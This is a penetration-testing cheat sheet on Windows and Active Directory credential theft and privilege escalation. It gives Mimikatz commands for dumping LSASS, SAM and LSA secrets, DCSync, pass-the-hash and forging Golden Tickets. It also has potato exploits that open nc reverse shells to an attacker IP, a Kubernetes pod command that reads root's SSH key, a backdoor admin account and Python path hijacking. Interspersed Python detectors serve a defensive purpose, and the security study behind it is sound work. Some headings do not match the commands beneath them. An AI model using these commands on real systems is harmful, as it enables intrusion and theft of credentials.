These modules live inside LSASS to handle specific tasks.
| DLL Name | Function / Description |
| --- | --- |
| Lsasrv.dll | The Manager. Enforces policy and chooses the protocol (Negotiate: Kerberos vs NTLM). |
| Msv1_0.dll | Local / NTLM. Handles non-domain logins and legacy NTLM authentication. |
| Kerberos.dll | Domain. Handles Kerberos ticket requests and validation. |
| Samsrv.dll | SAM Interface. Talks to the local SAM database. |
| Netlogon.dll | Network. Handles the secure channel for network logons. |
| Ntdsa.dll | AD Interface. Used to create/manage records in the Registry or AD. |
3. Credential Storage Locations
Local Users (SAM)
File Path: %SystemRoot%\system32\config\SAM
Registry Mount: HKLM\SAM
Protection: Partially encrypted by SYSKEY (syskey.exe) to prevent offline extraction.
Content: Local user NTLM/LM hashes.
| Registry Hive | Description |
| --- | --- |
| HKLM\SAM | Contains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords. |
| HKLM\SYSTEM | Stores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes. |
| HKLM\SECURITY | Contains sensitive information used by the Local Security Authority (LSA), including cached domain credentials (DCC2), cleartext passwords, DPAPI keys, and more. |
Domain Users (NTDS)
File Path: %SystemRoot%\ntds.dit
Location: Found only on Domain Controllers.
Content: Active Directory database (Users, Groups, Computers, GPOs, Hashes).
Sync: Replicates to all DCs (except Read-Only DCs).
Credential Manager (The Vault)
Role: Stores saved passwords for RDP, Websites, and Network Shares.
Mimikatz is a post-exploitation tool that can extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket, and build Golden Tickets.
Debug Privilege: Most Mimikatz operations require privilege::debug to access LSASS memory
Administrator Required: Mimikatz typically needs administrator privileges to function
LSASS Access: Many operations read from LSASS memory, which is protected by Windows
Detection: Mimikatz is heavily flagged by security products and EDR solutions
Pass the Hash: When using sekurlsa::pth, a new window will open - run commands in that new window
Golden Tickets: Golden Tickets are valid until the KRBTGT account password is changed (typically 180 days by default)
Ticket Files: Exported Kerberos tickets use .kirbi format
Domain Syntax: Use “.” for domain when targeting local machine accounts
Basic Usage & Privilege Escalation
```
# Launch Mimikatz (via SMB share)
\\tsclient\share\mimikatz.exe

# Enable debug privilege (required for most operations)
privilege::debug

# Elevate token to SYSTEM
token::elevate

# Write to console in base64 (avoid AV flagging)
base64 /out:true

# Write output to a logfile (flagged by AV!)
log <LOGFILE>.txt
```
Credential Dumping
LSASS Memory (sekurlsa)
Dump All Credentials:
```
# VERBOSE: Dumps credentials from all providers (Kerberos, WDigest, MSV, etc.)
sekurlsa::logonpasswords
```
Dump WDigest Plaintext Credentials:
```
# Plaintext creds if WDigest is enabled (older systems or manually enabled)
sekurlsa::wdigest
```
Dump Specific Hash Types:
```
# Dumps only LM/NTLM hashes
sekurlsa::msv
```
Export Kerberos Tickets:
```
# Avoid AV flagging
base64 /out:true

# Export Kerberos Tickets (TGT/TGS) to disk
sekurlsa::tickets /export
# $ : machine tickets (computers)
# @ : service tickets (users)
```
Extract AES Keys:
```
# Extract AES Keys for Pass the Key attacks
sekurlsa::ekeys
```
SAM Database
```
# Dumps local SAM database (local user hashes)
lsadump::sam
```
LSA Secrets
```
# Patches LSASS to dump LSA policy data/hashes
lsadump::lsa /patch

# Dumps LSA secrets from registry (autologon, service account passwords, etc.)
lsadump::secrets

# Dump specific account (e.g., KRBTGT for Golden Ticket)
lsadump::lsa /inject /name:krbtgt
```
DCSync
Might require runas.
```
# Specific user
lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\<USER>

# For KRBTGT
lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\krbtgt

# All users
# WARNING: takes a long time... write output to a file!
log dc_sync.txt
lsadump::dcsync /domain:<DOMAIN> /all
```
Pass the Hash (PtH)
Pass the Hash allows you to authenticate using an NTLM hash instead of a plaintext password.
```
# Use "." for domain if targeting local machine
# IMPORTANT: Run commands inside the NEW window that pops up
sekurlsa::pth /user:<USER> /ntlm:<PASS_HASH> /domain:<DOMAIN> /run:cmd.exe
```
Concept: Request a Kerberos Ticket (TGT) using an NTLM hash or AES Key, rather than using the NTLM protocol directly.
Extract AES Keys First:
```
sekurlsa::ekeys
```
Pass the Key with AES:
```
# Spawns a process. Windows will implicitly request a TGT using the injected key/hash when network resources are accessed.
# Can use /ntlm, /aes128, or /aes256
sekurlsa::pth /domain:<DOMAIN> /user:<USER> /aes256:<AES256_KEY> /run:cmd.exe
```
Pass the Ticket (PtT)
Pass the Ticket allows you to use stolen Kerberos tickets to authenticate as another user.
Export Tickets:
```
# Export tickets from memory to .kirbi files
sekurlsa::tickets /export
```
Inject Ticket:
```
# Inject ticket into current session
kerberos::ptt <TICKET_FILE.kirbi>
misc::cmd
exit
```
Golden & Silver Ticket Attack
A Golden Ticket is a forged Kerberos TGT that allows you to impersonate any user in the domain, including domain administrators.
A Silver Ticket is a forged Kerberos TGS that allows you to impersonate any user on a single machine.
Step 1: Get KRBTGT Hash & SID
Method A (On DC):
```
lsadump::lsa /inject /name:krbtgt
```
Method B (Remote DCSync):
```
lsadump::dcsync /domain:<DOMAIN> /user:krbtgt
```
Step 2: Create & Inject Ticket
/ptt - Injects the ticket directly into the current session, so it is ready to use.
/endin - The ticket lifetime. By default, Mimikatz generates a ticket valid for 10 years; the default AD Kerberos policy is 10 hours (600 minutes).
/renewmax - The maximum ticket lifetime with renewal. By default, Mimikatz generates a ticket valid for 10 years; the default AD Kerberos policy is 7 days (10080 minutes).
/user - Any value works, including non-existent users.
```
# OPTIONAL: Launch a shell, or exit and use the current shell since /ptt was used
misc::cmd   # this only works via RDP
exit

# Verify the ticket is working by reading the DC share
dir \\<DC_FQDN>\c$\
```
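An added detection-side example that is not part of the original notes: a Python check over `klist` output that flags tickets whose lifetime or renewal window exceeds the default AD policy quoted above, or whose TGT is RC4-encrypted (the encryption type Mimikatz uses when a ticket is forged from an NTLM hash). The klist sample and the 10-hour/7-day policy values are assumptions; substitute the domain's real policy.

```python
"""Flag Kerberos tickets that fall outside domain Kerberos policy.

Added example, not from the original notes. Policy values below are the
AD defaults the notes cite; substitute the target domain's real policy.
"""
import re
from datetime import datetime, timedelta

TGT_MAX_LIFE = timedelta(hours=10)   # assumed: "Maximum lifetime for user ticket"
TGT_MAX_RENEW = timedelta(days=7)    # assumed: "Maximum lifetime for user ticket renewal"
DATE_FMT = "%m/%d/%Y %H:%M:%S"       # klist prints e.g. "1/10/2024 9:00:00 (local)"

def parse_klist(text):
    """Return one {'Field': 'value'} dict per '#n>' ticket block."""
    tickets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"#\d+>\s*(.*)", line)
        if m:                      # start of a new ticket block
            cur = {}
            tickets.append(cur)
            line = m.group(1)
        if cur is None or ":" not in line:
            continue
        key, _, val = line.partition(":")
        cur[key.strip()] = val.replace("(local)", "").strip()
    return tickets

def check_ticket(t):
    """Return indicator strings for one ticket; an empty list means in policy."""
    issues = []
    start = datetime.strptime(t["Start Time"], DATE_FMT)
    end = datetime.strptime(t["End Time"], DATE_FMT)
    renew = datetime.strptime(t["Renew Time"], DATE_FMT)
    if end - start > TGT_MAX_LIFE:
        issues.append(f"lifetime {end - start} exceeds {TGT_MAX_LIFE}")
    if renew - start > TGT_MAX_RENEW:
        issues.append(f"renew window {renew - start} exceeds {TGT_MAX_RENEW}")
    # A TGT forged from an NTLM hash defaults to RC4; an AES domain should not issue RC4 TGTs.
    is_tgt = t.get("Server", "").startswith("krbtgt/")
    if is_tgt and "RC4" in t.get("KerbTicket Encryption Type", ""):
        issues.append("TGT encrypted with RC4-HMAC")
    return issues

def audit_klist(text):
    """Map 'client -> server' to that ticket's indicator list."""
    return {f"{t['Client']} -> {t['Server']}": check_ticket(t)
            for t in parse_klist(text)}

# Constructed klist output: #0 is a normal 10h/7d AES TGT, #1 looks forged.
SAMPLE_KLIST = """
#0>     Client: jdoe @ CONTOSO.LOCAL
        Server: krbtgt/CONTOSO.LOCAL @ CONTOSO.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Start Time: 1/10/2024 9:00:00 (local)
        End Time:   1/10/2024 19:00:00 (local)
        Renew Time: 1/17/2024 9:00:00 (local)

#1>     Client: Administrator @ CONTOSO.LOCAL
        Server: krbtgt/CONTOSO.LOCAL @ CONTOSO.LOCAL
        KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
        Start Time: 1/10/2024 9:05:00 (local)
        End Time:   1/7/2034 9:05:00 (local)
        Renew Time: 1/7/2034 9:05:00 (local)
"""

if __name__ == "__main__":
    for name, issues in audit_klist(SAMPLE_KLIST).items():
        print(name, issues or "in policy")
```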
Credential Manager
Dump credentials stored in Windows Credential Manager:
```
sekurlsa::credman
```
DPAPI (Data Protection API)
Decrypt data protected by Windows DPAPI, such as browser credentials:
```bash
for key in *id_rsa; do ssh-keygen -p -f "$key" -N "" -o ; done
```
Windows
```powershell
# Get PS Version
$PSVersionTable
```
---
```powershell
# Processes or Task List
tasklist /V | findstr <KEYWORD>

# Current User Info
whoami; hostname
whoami /priv    # Show current user's privileges
whoami /groups  # Show current user's group memberships

# List Users & Groups
net user                       # List all local users
net localgroup                 # List all local groups
net localgroup | findstr admin
net localgroup "<GROUP>"
net localgroup administrators  # List members of the Administrators group

# Password & Account Policy
net accounts          # (Local policy)
net accounts /domain  # (Domain policy)

# Shares
net share       # Shares by current computer
net use         # External connected shares
Get-SmbMapping  # Same but in PowerShell
Get-PSDrive -PSProvider FileSystem

# Map drive
net use <DRIVE>: \\<TARGET>\<SHARE>
net use <DRIVE>: \\<TARGET>\<SHARE> /user:<USER> <PASSWORD>

# Map drive (PowerShell)
New-PSDrive -PSProvider "FileSystem" -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"
$secpassword = ConvertTo-SecureString -AsPlainText -Force '<PASSWORD>'
$cred = New-Object System.Management.Automation.PSCredential '<USERNAME>', $secpassword
New-PSDrive -PSProvider "FileSystem" -Credential $cred -Name "<DRIVE>" -Root "\\<TARGET>\<SHARE>"

# Search filenames
dir /s /b <DRIVE>:\*<KEYWORD>*
Get-ChildItem -Recurse -File -Path <DRIVE>:\ -Include *<KEYWORD>*

# Search keyword in files
findstr /s /i <KEYWORD> <DRIVE>:\*.*
Get-ChildItem -Recurse -Path <DRIVE>:\ | Select-String -Pattern "<KEYWORD>"
```
Change User Password
via rpcclient with ForceChangePassword perm
This will only work without the user’s old password if the authenticating user has the ForceChangePassword permission at the domain level (or obviously if the user is a Domain Administrator):
```cmd
# Enable Registry Key to PtH for non-RID-500 local admins
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
```
Mimikatz (Interactive)
```
# Use "." for domain if targeting local machine
# IMPORTANT: Run commands inside the NEW window that pops up
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USER> /ntlm:<PASS_HASH> /domain:<DOMAIN> /run:cmd.exe" exit
```
psexec creates a remote service by uploading a randomly-named executable to the ADMIN$ share on the target host. It then registers the service via RPC and the Windows Service Control Manager. Once established, communication happens over a named pipe, providing an interactive remote shell as SYSTEM on the victim host.
wmiexec utilizes a semi-interactive shell where commands are executed through Windows Management Instrumentation. It does not drop any files or executables on the target host and generates fewer logs than other modules. After connecting, it runs as the local admin user we connected with (this can be less obvious to someone hunting for an intrusion than seeing SYSTEM executing many commands). Note that this shell environment is not fully interactive, so each command issued will execute a new cmd.exe from WMI and execute your command. The downside of this is that if a vigilant defender checks event logs and looks at event ID 4688: A new process has been created.
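An added example, not from the original notes, that turns the two artefacts described above into detections: a System-log 7045 service install whose binary is a randomly named executable in the Windows directory (what ADMIN$ maps to; psexec-style) and a Security-log 4688 cmd.exe whose parent is WmiPrvSE.exe (wmiexec-style). The JSON event records are constructed, and the 4-to-8-letter file name pattern is an assumption.

```python
"""Detect psexec- and wmiexec-style lateral movement from Windows events.

Added example, not from the original notes. Field names follow the Security
(4688) and System (7045) event XML; the records below are constructed.
"""
import json
import re

# Assumption: the dropped service binary has a short random alphabetic name
# directly in the Windows directory (the ADMIN$ share).
RANDOM_SVC_RE = re.compile(
    r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{4,8}\.exe$", re.IGNORECASE)

def is_psexec_service(ev):
    """7045 (System): a service installed for a randomly named binary."""
    if ev.get("EventID") != 7045:
        return False
    return bool(RANDOM_SVC_RE.match(ev.get("ImagePath", "").strip('"')))

def is_wmiexec_child(ev):
    """4688 (Security): cmd.exe whose parent is the WMI provider host."""
    if ev.get("EventID") != 4688:
        return False
    parent = ev.get("ParentProcessName", "").lower()
    child = ev.get("NewProcessName", "").lower()
    return parent.endswith("\\wmiprvse.exe") and child.endswith("\\cmd.exe")

def triage(lines):
    """Return (rule, computer, detail) for every JSON event that fires a rule."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if is_psexec_service(ev):
            hits.append(("psexec-service", ev["Computer"], ev["ImagePath"]))
        elif is_wmiexec_child(ev):
            hits.append(("wmiexec-child", ev["Computer"], ev.get("SubjectUserName", "?")))
    return hits

# Constructed events, one JSON object per line as a SIEM export might provide.
SAMPLE_EVENTS = [
    '{"EventID": 7045, "Computer": "SRV01", "ServiceName": "Spooler", '
    '"ImagePath": "C:\\\\Windows\\\\System32\\\\spoolsv.exe"}',
    '{"EventID": 7045, "Computer": "SRV01", "ServiceName": "pQkz", '
    '"ImagePath": "%SystemRoot%\\\\pQkzLmWc.exe"}',
    '{"EventID": 4688, "Computer": "SRV02", "SubjectUserName": "jdoe", '
    '"ParentProcessName": "C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe", '
    '"NewProcessName": "C:\\\\Windows\\\\System32\\\\cmd.exe"}',
    '{"EventID": 4688, "Computer": "SRV02", "SubjectUserName": "jdoe", '
    '"ParentProcessName": "C:\\\\Windows\\\\explorer.exe", '
    '"NewProcessName": "C:\\\\Windows\\\\System32\\\\cmd.exe"}',
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(*hit)
```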
```cmd
# Create local user and add to local Administrators group
net user svc_backup P@ssw0rd123! /add
net localgroup Administrators svc_backup /add
net user svc_backup
```
| Capability | Description |
| --- | --- |
| cap_setuid | Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the root user. |
| cap_setgid | Allows a process to set its effective group ID, which can be used to gain the privileges of another group, including the root group. |
| cap_sys_admin | Provides a broad range of administrative privileges, including the ability to perform many actions reserved for the root user, such as modifying system settings and mounting and unmounting file systems. |
| cap_dac_override | Allows bypassing of file read, write, and execute permission checks. |
```bash
# Create new pod
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 apply -f privesc.yaml

# Verify
kubectl --token=$token --certificate-authority=ca.crt --server=https://<TARGET>:6443 get pods

# Get root key
kubeletctl --server <TARGET> exec "cat /root/root/.ssh/id_rsa" -p privesc -c privesc
```
🪟 Windows
Check [[active-directory]] for a whole host of domain-related priv escs.
Check [[security-products]] for bypasses for UAC and more.
Check [[finding-creds]] for searching for credentials.
```powershell
# Running processes and services
tasklist /svc
netstat -ano

# Scheduled Tasks
schtasks /query /fo LIST /v

# Env Variables
set

# Detailed machine info
systeminfo
ver
[environment]::OSVersion.Version

# Alt method for Hotfixes
wmic qfe list brief
Get-HotFix | ft -AutoSize

# Query logged-in users (usually RDP)
query user

# Current user
echo %USERNAME%

# Current User Privs & Groups
whoami /all

# User accounts w/ Descriptions
Get-LocalUser

# All users, groups, admins, password policy
net user
net user %username%
net localgroup
net localgroup administrators
net accounts
gpresult /r

# Command line history
(Get-PSReadLineOption).HistorySavePath

# List Named Pipes
pipelist.exe /accepteula
Get-ChildItem \\.\pipe\

# Show Named Pipe Permissions
# NOTE: Drop the "\\."
accesschk.exe /accepteula \pipe\<NAME> -v
```
Privileges are tied to WHO (the user's access token, assigned at logon; a local and a domain logon can carry different privileges). They are essentially overrides that bypass the normal rules (access rights).
SeTakeOwnershipPrivilege: Allows you to change the Owner of any object. Once you are the Owner, Windows automatically grants you the Access Right to rewrite the DACL (known as WRITE_DAC). You can then grant yourself GenericAll Access Rights.
SeImpersonatePrivilege: Allows you to copy a higher-privileged Token (e.g., NT AUTHORITY\SYSTEM via tools like SweetPotato/PrintSpoofer), instantly granting you all System Privileges and Universal Access Rights.
Access Rights (permissions) are tied to WHAT (the object: File, Folder, Registry Key, Service, Named Pipe) via "Security Descriptors".
Security Principals are the WHO: users, machines, or groups, each with their own SID. Groups cannot log in but can hold Access Rights.
When a Security Principal (e.g. a user) wants to access a resource (e.g. a file), the OS performs an authorization check of the user's token against the resource's Security Descriptor (its access rights). The Security Descriptor may contain multiple Access Control Entries; access is granted if at least one of them matches.
| Privilege (policy name) | Description |
| --- | --- |
| SeRemoteInteractiveLogonRight (Allow log on through Remote Desktop Services) | This policy setting determines which users or groups can access the login screen of a remote device through a Remote Desktop Services connection. A user can establish a Remote Desktop Services connection to a particular server but not be able to log on to the console of that same server. |
| SeBackupPrivilege (Back up files and directories) | This user right determines which users can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. |
| SeSecurityPrivilege (Manage auditing and security log) | This policy setting determines which users can specify object access audit options for individual resources such as files, Active Directory objects, and registry keys. These objects specify their system access control lists (SACL). A user assigned this user right can also view and clear the Security log in Event Viewer. |
| SeTakeOwnershipPrivilege (Take ownership of files or other objects) | This policy setting determines which users can take ownership of any securable object in the device, including Active Directory objects, NTFS files and folders, printers, registry keys, services, processes, and threads. |
| SeDebugPrivilege (Debug programs) | This policy setting determines which users can attach to or open any process, even a process they do not own. Developers who are debugging their applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides access to sensitive and critical operating system components. |
| SeLoadDriverPrivilege (Load and unload device drivers) | This policy setting determines which users can dynamically load and unload device drivers. This user right is not required if a signed driver for the new hardware already exists in the driver.cab file on the device. Device drivers run as highly privileged code. |
| SeRestorePrivilege (Restore files and directories) | This security setting determines which users can bypass file, directory, registry, and other persistent object permissions when they restore backed up files and directories. It determines which users can set valid security principals as the owner of an object. |
| SeImpersonatePrivilege (Impersonate a client after authentication). Default holders: Administrators, Local Service, Network Service, Service | This security setting determines whether a process can assume the identity of any user and, through this, obtain access to resources that the targeted user is permitted to access (impersonation). This may be assigned to antivirus or backup tools that need the ability to access all system files for scans or backups. This privilege should be reserved for service accounts requiring this access for legitimate activities. |
Good Accounts
| Account | Description |
| --- | --- |
| NT AUTHORITY\SYSTEM / LocalSystem | A highly privileged account with more privileges than a local administrator; used to run most Windows services. See LocalSystem account. |
| Built-in local Administrator | The built-in local administrator account. Some organizations disable this account, but many do not. It is not uncommon to see this account reused across multiple systems in a client environment. |
| Local member of Administrators | Another local account in the local Administrators group. Any account in this group has the same privileges as the built-in Administrator account. |
| Domain user in local Administrators | A standard (non-privileged) domain user who is part of the local Administrators group. |
| Domain admin in local Administrators | A domain admin (highly privileged in Active Directory) that is part of the local Administrators group. |
Domain Admins and Enterprise Admins are “super” groups.
| Group | Description |
| --- | --- |
| Server Operators | Members can modify services, access SMB shares, and backup files. |
| Backup Operators | Members are allowed to log onto DCs locally and should be considered Domain Admins. They can make shadow copies of the SAM/NTDS database, read the registry remotely, and access the file system on the DC via SMB. This group is sometimes added to the local Backup Operators group on non-DCs. |
| Print Operators | Members can log on to DCs locally and "trick" Windows into loading a malicious driver. |
| Hyper-V Administrators | If there are virtual DCs, any virtualization admins, such as members of Hyper-V Administrators, should be considered Domain Admins. |
| Account Operators | Members can modify non-protected accounts and groups in the domain. |
| Remote Desktop Users | Members are not given any useful permissions by default but are often granted additional rights such as Allow Login Through Remote Desktop Services and can move laterally using the RDP protocol. |
| Remote Management Users | Members can log on to DCs with PSRemoting (this group is sometimes added to the local remote management group on non-DCs). |
| Group Policy Creator Owners | Members can create new GPOs but would need to be delegated additional permissions to link GPOs to a container such as a domain or OU. |
| Schema Admins | Members can modify the Active Directory schema structure and backdoor any to-be-created Group/GPO by adding a compromised account to the default object ACL. |
| DNS Admins | Members can load a DLL on a DC, but do not have the necessary permissions to restart the DNS server. They can load a malicious DLL and wait for a reboot as a persistence mechanism. Loading a DLL will often result in the service crashing. A more reliable way to exploit this group is to create a WPAD record. |
File/Folder Permissions
Look for F, M, or W assigned to unprivileged groups.
| Code | Meaning | Offensive Value |
| --- | --- | --- |
| F | Full Control | Jackpot. You can overwrite the file, read it, delete it, or change its permissions. |
| M | Modify | High. You can read, write, and delete the file. (Functionally identical to F for hijacking.) |
| W | Write | High. You can overwrite the file with a malicious payload (e.g., a reverse shell .exe). |
| RX | Read & Execute | None (Usually). You can read the file and run it, but you cannot alter it. |
| R | Read | Low. Useful only for stealing configuration files or hardcoded credentials. |
| Code | Meaning | Context |
| --- | --- | --- |
| (I) | Inherited | This permission wasn't set on the file itself; it was passed down from the parent folder (e.g., C:\Program Files). |
| (OI) | Object Inherit | Applied to a folder: all files inside will inherit this permission. |
| (CI) | Container Inherit | Applied to a folder: all sub-folders inside will inherit this permission. |
| (IO) | Inherit Only | This permission applies only to children, not to the current folder itself. |
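An added example, not from the original notes, that turns the two tables above into an audit: a Python parser for `icacls` output that reports F, M, W (and write-capable specific rights such as WD) granted to unprivileged principals, while honouring (DENY) and (IO) entries that do not grant access to the object itself. The paths, principals and icacls sample are constructed, and the list of "unprivileged" principal names is an assumption.

```python
"""Audit icacls output for permissions that allow binary hijacking.

Added example, not from the original notes: flags ACEs that give F, M, W
(or a write-capable specific right) to unprivileged principals, as the
tables above describe. The sample output is constructed.
"""
import re

# Principal names (after any DOMAIN\ prefix) treated as unprivileged (assumption).
LOW_PRIV_NAMES = {"everyone", "users", "authenticated users", "domain users"}
WRITE_SIMPLE = {"F", "M", "W"}                    # simple rights
WRITE_SPECIFIC = {"WD", "AD", "WDAC", "WO", "D"}  # specific rights
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# First output line is "<path> <first ACE>"; the split is heuristic when the
# file name contains spaces and the principal has no DOMAIN\ prefix.
FIRST_RE = re.compile(
    r"^(?P<path>[A-Za-z]:\\.*?) (?P<ace>(?:[^\\:]+\\)?[^:\\]+:(?:\([^)]*\))+)$")
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<groups>(?:\([^)]*\))+)$")

def parse_icacls(text):
    """Return {path: [(principal, is_deny, flags, rights), ...]}."""
    acls, path = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if not raw.startswith(" "):          # a new path starts here
            m = FIRST_RE.match(line)
            if not m:
                continue
            path, line = m.group("path"), m.group("ace")
        m = ACE_RE.match(line)
        if path is None or not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        flags = {g for g in groups if g in INHERIT_FLAGS}
        rights = set()
        for g in groups:
            if g != "DENY" and g not in INHERIT_FLAGS:
                rights.update(p.strip() for p in g.split(","))
        acls.setdefault(path, []).append((m.group("who"), "DENY" in groups, flags, rights))
    return acls

def find_weak_aces(acls):
    """Return (path, principal, rights) where an unprivileged principal can write."""
    findings = []
    for path, aces in acls.items():
        for who, is_deny, flags, rights in aces:
            name = who.rsplit("\\", 1)[-1].lower()
            # Deny ACEs and (IO) ACEs never grant access to the object itself.
            if is_deny or "IO" in flags or name not in LOW_PRIV_NAMES:
                continue
            if rights & WRITE_SIMPLE or rights & WRITE_SPECIFIC:
                findings.append((path, who, ",".join(sorted(rights))))
    return findings

# Constructed icacls output: VulnApp is writable by Users, SafeApp is not,
# C:\Tools only through a write-capable specific right (WD).
SAMPLE_ICACLS = r"""C:\Program Files\VulnApp\service.exe BUILTIN\Users:(I)(F)
                                     NT AUTHORITY\SYSTEM:(I)(F)
                                     BUILTIN\Administrators:(I)(F)

C:\Program Files\SafeApp\app.exe NT AUTHORITY\SYSTEM:(I)(F)
                                 BUILTIN\Administrators:(I)(F)
                                 BUILTIN\Users:(I)(RX)

C:\Tools Everyone:(OI)(CI)(IO)(M)
         Everyone:(DENY)(W)
         CONTOSO\Domain Users:(OI)(CI)(RX,WD)
"""
```

Run `find_weak_aces(parse_icacls(SAMPLE_ICACLS))`, or feed it the captured output of `icacls` over the service and program directories of interest.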
Needs SeImpersonate (or equivalent for the tool chain). Upload the chosen binary and nc.exe (or use built-in shells where documented).
RoguePotato (usage): -r is the redirector (usually your attacker host); -e is the full command line; -l runs RogueOxidResolver locally on that port (all-in-one). Optional: -c {clsid}, -p / -z pipe name.
```bash
# Listener on attacker
nc -lnvp <PORT>
```
```
# All-in-one: RogueOxidResolver on victim, forward/OXID redirector at attacker
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe" -l 9999

# Without local RogueOxidResolver: run RogueOxidResolver.exe on the remote/redirector machine (see repo), then e.g.:
c:\tools\RoguePotato.exe -r <ATTACKER_IP> -e "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"
```
GodPotato (example): only -cmd is required; the tool supplies CLSID behavior internally.
```bash
nc -lnvp <PORT>
```
```
c:\tools\GodPotato.exe -cmd "cmd /c c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd.exe"

# As in upstream README (nc connects out; adjust paths/nc flags to your binary)
c:\tools\GodPotato.exe -cmd "nc -t -e C:\Windows\System32\cmd.exe <ATTACKER_IP> <PORT>"
```
PrintSpoofer (usage): -c runs the command as SYSTEM; -i attaches an interactive SYSTEM process to the current console (bind/reverse/psexec-style shells).
```bash
nc -lnvp <PORT>
```
```
# Non-interactive: spawn and exit (WinRM/webshell-style), matches upstream example
c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe <ATTACKER_IP> <PORT> -e cmd"

# Interactive: SYSTEM cmd in the same console (reverse/bind shell, psexec, etc.)
c:\tools\PrintSpoofer.exe -i -c cmd
```
PrintNightmare (usage): PowerShell via the Print Spooler (Invoke-Nightmare). By default, it creates local admin adm1n with password P@ssw0rd; use parameters to set custom credentials or load a custom DLL payload.
NOTE: this is considered dangerous and destructive: not only can it be hard to revert, it can also have unintended consequences and break services that use the file.
```powershell
# Get file info
Get-ChildItem -Path '<FILE>' | Select FullName,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

# Or if that fails, check the folder ownership
cmd /c dir /q '<FOLDER>'

# Change ownership
takeown /f '<FILE>'

# OPTIONAL: grant ACL permissions (F = *full* control; substitute e.g. R for read only)
icacls '<FILE>' /grant <USER>:F
```
Python
The following logic can be placed under a particular module’s function (ideally at the beginning of the function) to achieve a priv esc:
```python
import os
os.system("id")
os.system('ls -la /root/')
```
Wrong write permissions
```bash
# Check the Python script itself
ls -la <PYTHON_FILE>

# Then check its imports: see if any are hookable
python3 -V
grep -r "def <FUNCTION>" /usr/local/lib/python3.8/dist-packages/<MODULE>/*
ls -l /usr/local/lib/python3.8/dist-packages/<MODULE>/__init__.py
```
Library Path
```bash
# Check Python library import order
python3 -c 'import sys; print("\n".join(sys.path))'

# Check for module location
pip3 show <MODULE>
```
PYTHONPATH environment variable
```bash
# Sometimes the script or executable needs to be executed in a very specific manner
sudo -l

# Execute the over-written function
sudo PYTHONPATH=/tmp/ /usr/bin/python3 <PYTHON_FILE>
```
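An added example, not from the original notes, that audits the import path the commands above enumerate from the defender's side: it stats every sys.path entry in import order and each imported module's file and package directory, and reports anything group- or world-writable, missing, or not owned by a trusted uid. Root (uid 0) as the only trusted owner and Unix mode bits are assumptions.

```python
"""Audit the Python import path for hijackable directories and modules.

Added example, not from the original notes: a privileged script's imports
can be replaced through a writable module file, package directory or an
earlier sys.path entry. Mode checks are Unix-style; trusted uid 0 assumed.
"""
import importlib.util
import os
import stat
import sys

def classify(path, mode, uid, trusted_uids=(0,)):
    """Return why (path, st_mode, st_uid) is hijackable, or None if it is not."""
    if mode & stat.S_IWOTH:
        return f"{path}: world-writable"
    if mode & stat.S_IWGRP:
        return f"{path}: group-writable"
    if uid not in trusted_uids:
        return f"{path}: owned by uid {uid}, not a trusted uid"
    return None

def audit_paths(paths, trusted_uids=(0,)):
    """Stat each path and collect classify() findings."""
    findings = []
    for p in paths:
        try:
            st = os.stat(p)
        except OSError:
            # A missing sys.path entry (e.g. pythonXY.zip) is itself a hijack
            # point if its parent directory is writable: report, don't skip.
            findings.append(f"{p}: does not exist")
            continue
        reason = classify(p, st.st_mode, st.st_uid, trusted_uids)
        if reason:
            findings.append(reason)
    return findings

def module_paths(name):
    """Resolve a module to its file plus package directories, if importable."""
    spec = importlib.util.find_spec(name)
    if spec is None or not spec.origin or spec.origin in ("built-in", "frozen"):
        return []
    paths = [spec.origin]
    paths.extend(spec.submodule_search_locations or [])
    return paths

def audit_script_imports(module_names, trusted_uids=(0,)):
    """Check sys.path in import order, then each named module's own files."""
    findings = audit_paths([p for p in sys.path if p], trusted_uids)
    for name in module_names:
        findings.extend(audit_paths(module_paths(name), trusted_uids))
    return findings

if __name__ == "__main__":
    # Modules a privileged script imports; constructed list for demonstration.
    for finding in audit_script_imports(["os", "json"]):
        print(finding)
```

Feed `audit_script_imports` the import names from the script that `sudo -l` allows, and run it as the user that would execute that script so sys.path matches.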
If using BloodHound check for ReadLAPSPassword in graph.
```bash
# Enumerate who can read LAPS
nxc smb <DC_IP> -u <USER> -p <PASS> --laps

# Dump the passwords (if able)
nxc smb <TARGET> -u <USER> -p <PASS> --laps
```
---
```powershell
# OUT OF DATE
# https://github.com/leoloobeek/LAPSToolkit
wget https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1
Import-Module LAPSToolkit.ps1

# Scans OUs for groups "LAPS Admins" that can read LAPS passwords on all computers in the OU
Find-LAPSDelegatedGroups

